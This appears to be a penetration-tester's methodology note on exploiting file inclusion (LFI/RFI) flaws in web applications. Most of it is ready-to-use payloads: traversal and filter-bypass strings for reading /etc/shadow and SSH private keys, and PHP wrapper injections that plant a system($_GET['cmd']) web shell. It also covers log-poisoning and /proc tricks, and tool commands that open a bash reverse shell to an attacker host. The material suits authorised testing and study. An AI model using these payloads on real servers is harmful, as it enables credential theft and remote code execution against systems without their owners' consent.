# WebApps - Local & Remote File Inclusion [LFI/RFI]

The File Inclusion vulnerability allows for the include of a file locally
present on the server or remotely hosted on a webserver, usually exploiting a
"dynamic file inclusion" mechanisms implemented in the target application.  

This issue is caused when an application builds a path to executable code using
an attacker-controlled variable in a way that allows the attacker to control
which file is executed at run time. The vulnerability occurs due to the use of
user-supplied input without proper validation.

A file include vulnerability is distinct from a generic Directory Traversal
Attack, in that directory traversal is a way of gaining unauthorized file
system access, and a file inclusion vulnerability subverts how an application
loads code for execution.

### File Inclusion vulnerability detection

In black box testing, look for scripts which take filenames as parameters,
such as the following examples:

```
http://vulnerable_host/preview.php?file=example.html
http://vulnerable_host/?op=home
```

Try to access freely accessible files, such as:

```
# Linux
/etc/passwd

# Windows
WINDOWS\System32\drivers\etc\hosts
```

### File access

###### Basic

Typical proof-of-concept for basic LFI would be:

```
# Linux
?file=../../../../../../../../../../etc/passwd

# Windows
?file=..\..\..\..\..\..\..\..\..\..\WINDOWS\System32\drivers\etc\hosts
```

###### Files of interest

The following Linux files can be of interest:

```
# System information
/etc/issue

# System users account information
/etc/passwd

# System users account hashed password
/etc/shadow

# System groups information
/etc/group

/home/<USERNAME>/.ssh/id_rsa
/root/.ssh/id_rsa
/home/<USERNAME>/.ssh/authorized_keys
/root/.ssh/authorized_keys
```

###### Null Byte

In some cases, the server will append an extension at the end of the requested
file, such as ".php”.

Such mechanisms can be bypassed using the line terminator char *null byte*:

```
# Linux
?file=../../../../../../../../../../etc/passwd%00

# Windows
?file=..\..\..\..\..\..\..\..\..\..\WINDOWS\System32\drivers\etc\hosts%00
```

###### Double encoding

Encoding parameters twice in hexadecimal format can be leveraged to bypass
security controls such as blacklist filters.  
For example, the '.' (*dot*) character represent %2E in hexadecimal
representation. When the % symbol is encoded again, its representation in
hexadecimal code is %25. The result from the double encoding process is %252E.

```
# Linux
?file=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

# Windows
?file=%252e%252e%255c%252e%252e%255c%252e%252e%255cWINDOWS%255cSystem32%255cdrivers%255cetc%255chosts
```

###### Filter bypass

Some blacklist filter may be implemented and restrict the usage of "../".  
Those kind of filter may be passed using the following payloads:

```
# Linux
?file=..././..././..././etc/passwd
?file=....//....//etc/passwd
?file=..///////..////..//////etc/passwd

# Windows
?file=....\\....\\....\\....\\....\\....\\WINDOWS\System32\drivers\etc\hosts%00
?file=..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\WINDOWS\System32\drivers\etc\hosts%00
```

###### PHP wrappers

**php://filter**  
This PHP wrapper can be used to access the source code of the page:

```
# Base64 encoding
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=config.php%00

# rot13 encoding
?page=php://filter/read=string.rot13/resource=config.php
?page=php://filter/read=string.rot13/resource=config.php%00
```

### Remote Code Execution

###### Basic remote file inclusion

If a File Inclusion vulnerability can be used to include remote files, the
vulnerability could be leveraged to make the web application retrieve and
execute a remote script.

The included script must be in a language supported by the web application.
Refer to the `[General] Shell` note for web and reverse shell payloads.

```
?file=<URL_TO_SCRIPT>
```

###### File upload

If the web application exposes an upload functionality, the uploaded files
could be leveraged through a local file inclusion to execute code on the target.

If no filter restrict the uploaded files type, the uploaded files should be in a
language supported by the web application to achieve code execution.
Refer to the `[General] Shell` note for web and reverse shell payloads.

Multiples filters can however limit the files type accepted by the web
application
  - client-side restrictions using `JavaScript`, etc.
  - HTTP `Content-Type` verification   
  - file extension black or white listing

Knowledge of the uploaded files path could be needed in order to include the
files through the local file inclusion vulnerability if the upload directory is
different from the file inclusion vulnerability working directory. The upload
directory path may be leaked by the web application, usually in error messages
or in settings / configuration web pages.

Refer to the `[WebApps] File upload` note for more information on how to bypass
upload filters and retrieve the uploaded file path.

###### PHP wrappers

*data*

The PHP *data://* wrapper allows for the injection and execution of PHP code
given in parameter:

```
# <?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B

# <?php system($_GET['cmd']); ?>
?page=data://text/plain;base64,PD8gcGhwIHN5c3RlbSgkX0dFVFsnY21kJ10pOyA%2fPg%3d%3d

# XSS (alert(1))
?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
```

*expect*  

The PHP *expect://* wrapper allows execution of system commands but is not
enabled by default.

```
php?page=expect://whoami
```

*input*  

The PHP *input://* wrapper allows for the injection and execution of PHP code
given in the POST request body:

```
POST .../?page=php://input&cmd=whoami
...
<?php system($_GET['cmd']); ?>
```

*zip / phar*  

The *zip://* and *phar://* wrappers can be used to achive code execution if a
zip or phar archive can be upload to the server:

```
# <pre><?php system($_GET['cmd']); ?></pre>
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;   
# As the file extension does not matter, a file with a jpg extension can be uploaded
mv payload.zip shell.jpg;    

# zip://<PATH_TO_UPLOADED_FILE>%23<FILE_INSIDE_ZIP>&cmd=<CMD>
?page=zip://shell.jpg%23payload&cmd=whoami
?page=zip://shell.jpg%23payload.php
```

###### Log files contamination

Code can be injected into log files, principle known as log files
contamination, in order to be executed whenever accessing the log files through
a LFI.

On Linux, the log files of the Apache, SSH, FTP or SMTP services can be
targeted.

*Apache*

The server access log records all requests processed by the server and the
server error log contains any errors encountered while processing requests.

The access log may record the request GET parameters as well as the User-Agent
and Referer HTTP headers.

Depending on the configured level of error logging enabled on the server, the
error log files may record the URI for missing requested resources (HTTP
error 404).

Possible `httpd.conf` locations, in which access, error or custom log files
locations may be defined:

```
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
```

Additionally, the following locations could be used for the Apache access /
error log files:  

```
# Access log files possible locations
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log
/apache/logs/access.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/var/log/access.log
/var/log/access_log
/usr/local/apache/log
/usr/local/apache/logs
/var/www/log/access.log
/var/www/log/access_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/apache/logs/access_log
/var/log/nginx/access.log
/var/log/apache-ssl/access.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/opt/lampp/logs/access_log
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
C:\apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log

# Error log files possible locations
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/apache/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/var/log/error.log
/var/log/error_log
/usr/local/apache/error
/usr/local/apache/errors
/var/www/log/error.log
/var/www/log/error_log
/var/www/logs/error.log
/var/www/logs/error_log
/var/apache/logs/error_log
/var/log/nginx/error.log
/var/log/apache-ssl/error.log
/opt/lampp/logs/error_log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\xampp\apache\logs\error.log
```

*SSH / FTP*

Every connection attempts to the SSH or FTP services may be logged. As the
username specified for the connection attempt is recorded, it can be used as an
injection point.

Default configuration files locations that define the SSH / FTP services log
files location:

```
/etc/ssh/sshd_config
/etc/vsftpd.conf
```

`rsyslog`, an open-source software utility used on UNIX and Unix-like computer
systems, may be deployed on the targeted system to centralize logs. The utility
configuration is defined in the `/etc/rsyslog.conf` configuration file and the
authentication log policies are specified in the sub-system `auth.*`

```
# SSH log files possible locations
/var/log/sshd.log

# FTP log files possible locations
/var/log/vsftpd.log
/var/log/sftp.log
/var/log/ftp.log
/var/log/messages
/var/log/xferlog

# Failed attempts
/var/log/auth.log
```

*SMTP Log Poisioning*

Information about the emails sent through the service may be logged. By default
Postfix notably includes email addresses of the sender and recipients.

Refer to the `L7 SMTP - Methodology` note for more information on how to
manually send emails through a SMTP service.

```
/var/log/mail
```

###### Proc environ or files descriptor injection

The `/proc/self/environ` file contains the environment variables of the current
process and notably, for an Apache process, the variable `HTTP_USER_AGENT` set
from the User-Agent requests. Making requests containing code in the HTTP
User-Agent header and accessing the `/proc/self/environ` file through a LFI
could result in code execution. Note that on modern Linux systems this file is
not accessible to unprivileged users.

Environment variables of others processes can also be accessed by privileged
users using `/proc/<PID>/environ` and could also be exploited, given the web
service is running under elevated privileges and the environment variables of
an other process can be populated through user controlled parameter.

The `/proc/self/fd/<FD_ID>` and `/proc/<PID>/fd/<FD_ID>` files references the
pipes or sockets opened respectively by the current and the specified
process. Theses files are used for inter process communication and may include
content populated through user controlled parameters. If such content can be
identified, for example the logging of requests processed or active session
cookies defined, a LFI vulnerability could be leveraged into code execution.

###### PHP sessions

By default, PHP stores information about the active sessions in
`/var/lib/php/sess_<PHPSESSID>` or `/var/lib/php5/sess_<PHPSESSID>` (PHP5).
For instance the session `PHPSESSID=uv06hljg4igcfkf3nsk9tsjle5` would be stored
in `/var/lib/php5/sess_uv06hljg4igcfkf3nsk9tsjle5`.

The default session files locations can be modified using the
`session.save_path` configuration directive in the `php.ini` configuration file
 or at runtime using `ini_set('session.save_path', '/path/sessions/folder')`.

###### phpinfo()

If available, a page executing and returning the PHP's `phpinfo()` function
could be used to leverage a LFI vulnerability into remote code execution.

The `phpinfo()` function returns the currently defined variables in its scope,
notably including the values sent through the request `GET` or `POST`
parameters and the  uploaded file `_FILES`, which contains the temporary file
upload location on the file system `tmp_name`. The temporary uploaded file only
exists while the PHP processor is operating on the requested .php file, and is
deleted at the end of processing. By making multiple large upload `POST`
requests to the `phpinfo` script with a number of large HTTP headers, it is
possible to increase the processing time in order to retrieve the name of a
temporary file and access it through the LFI vulnerability before deletion.

More information about this exploit technique can be found here:
`https://insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf`

Additionally, the `LFISuite` tool presented below can be used to automatically
exploit this technique.  

### Automatic exploit tools

###### Kadimus

*LFISuite offers a more complete approach*

`Kadimus` is CLI tool to automatically scan and exploit Local File Inclusion
vulnerabilities using the following methods of attack:
  - /var/log/auth.log RCE
  - /proc/self/environ RCE
  - php://input RCE
  - data://text RCE

```
# Scan for LFI vulnerability
kadimus -t 20 [--cookie <COOKIE>] -u <URL>

# Simple command shell
kadimus -u <URL> --parameter <VULNERABLE_PARAMETER> -T <auth | data | environ | input> --shell
# Reverse shell
kadimus -u <URL> --parameter <VULNERABLE_PARAMETER> -T <auth | data | environ | input> -l <LPORT> -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' --retry-times 0
kadimus -u <URL> --parameter <VULNERABLE_PARAMETER> -T <auth | data | environ | input> -l <LPORT> -c '<SYSTEM_REVSHELL_COMMAND>' --retry-times 0
```

###### LFISuite

`LFISuite` is CLI multi-platforms (Windows, Linux and OS X) tool to
automatically scan and exploit Local File Inclusion vulnerabilities.
It provides a more exhaustive list of possible log files locations and also
offers more attacks methods that `Kadimus`:
  - /proc/self/environ
  - php://filter
  - php://input
  - /proc/self/fd
  - access log
  - phpinfo
  - data://
  - expect://

All methods above can be tried automatically by specifying the `Auto-Hack`
modality. If a LFI vulnerability is detected, the `reverseshell` command can be
used to start a reverse shell.

```
python lfisuite.py

--------------------
 1) Exploiter       
 2) Scanner         
 x) Exit            
--------------------
-> 1

____________________________

    Available Injections    
____________________________

 [...]
 9) Auto-Hack  			   
 x) Back 				   
____________________________

 -> 9

[*] Enter the URL you want to try to hack (ex: 'http://site/vuln.php?id=') -> <URL>
```
